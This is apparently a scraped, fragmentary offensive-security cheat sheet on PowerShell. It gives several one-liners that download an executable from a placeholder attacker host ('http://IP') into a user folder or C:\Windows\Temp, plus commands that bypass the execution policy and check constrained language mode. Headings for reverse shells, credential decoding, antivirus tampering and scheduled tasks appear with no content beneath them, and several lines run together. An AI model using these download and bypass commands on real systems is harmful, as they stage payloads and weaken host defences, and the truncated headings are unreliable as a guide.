Powershell
Offensive PowerShell
Powershell Path:
C:\windows\syswow64\windowspowershell\v1.0\powershell
C:\Windows\System32\WindowsPowerShell\v1.0\powershellDownload:
Invoke-Webrequest -URI http://IP/file.exe -O file.exe
(New-Object Net.WebClient).DownloadFile("http://IP/file.exe","C:\Windows\Temp\file.exe")
wget http://IP/file.exe -OutFile file.exe
curl http://IP/file.exe -O file.exeExecution Policy:
Get-ExecutionPolicyBypass ExecutionPolicy:
PowerShell.exe -ExecutionPolicy Bypass -File .\file.ps1
Set-Executionpolicy -Scope CurrentUser -ExecutionPolicy UnRestrictedConstrained Language:
$ExecutionContext.SessionState.LanguageMode
#Values could be: FullLanguage or ConstrainedLanguageDirect bypass:
Reverse shell:
Secure String to Plaintext
Antivirus (Requires Higher Privileges)
Execute Commands as Another User
Scheduled Tasks
Last updated